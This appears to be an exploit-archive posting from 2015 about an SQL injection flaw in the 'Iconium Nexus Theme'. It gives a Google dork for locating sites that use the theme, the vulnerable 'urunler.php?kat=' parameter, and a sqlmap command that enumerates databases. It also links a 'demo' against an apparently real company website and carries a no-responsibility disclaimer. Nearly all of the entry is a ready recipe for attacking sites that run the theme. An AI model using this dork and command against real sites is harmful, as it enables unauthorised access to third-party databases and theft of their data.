id: 23232
date: 02/03/2015
title: Iconium Nexus Theme - SQL Injection Vulnerability
author: Herdem
cves: 

# Exploit Title:Iconium Nexus Theme - SQL İnjection vulnerability
# Google Dork: intext:Powered by İconium Mühendislik
# Date: 03.02.2015
# Exploit Author: Herdem
# Vendor Homepage: http://iconiummuhendislik.com
# Version: All Versions
# Tested on: Windows / Linux

*******************************************************
**** Author will be not responsible for any damage ****
*******************************************************

*** Explanation ***
*** Vulnerable : Sql Injection
*** Vulnerabilitie Area : www.site.com/urunler.php?kat=[ID]
*** Exploit code : sqlmap.py -u www.site.com/urunler.php?kat=[ID] --dbs --threads=10

******************************************************
Demo : http://www.yazicimakina.com/urunler.php?lang=1'a

******************************************************

Greetz : All b3yaz.org members & Mugair

******************************************************

#  0day.today [2023-03-23]  #